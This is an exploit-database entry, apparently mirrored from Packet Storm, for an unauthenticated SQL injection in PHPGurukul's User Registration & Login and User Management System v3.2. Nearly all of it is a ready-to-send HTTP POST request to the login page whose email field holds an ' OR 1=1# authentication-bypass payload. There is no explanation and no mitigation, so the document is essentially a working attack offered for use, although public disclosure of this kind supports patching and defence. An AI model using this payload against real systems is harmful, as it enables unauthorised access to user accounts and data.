Share
## https://sploitus.com/exploit?id=PACKETSTORM:177935
# Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)
# Exploit Author: Yusuf DİNÇ
# Google Dork: NA
# Date: 05/03/2024
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 3.2
# Tested on: Linux
POST /test/loginsystem/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://localhost
Connection: close
Referer: http://localhost/test/loginsystem/login.php
Cookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
uemail=test%40gmail.com'+OR+1=1#&password=test&login=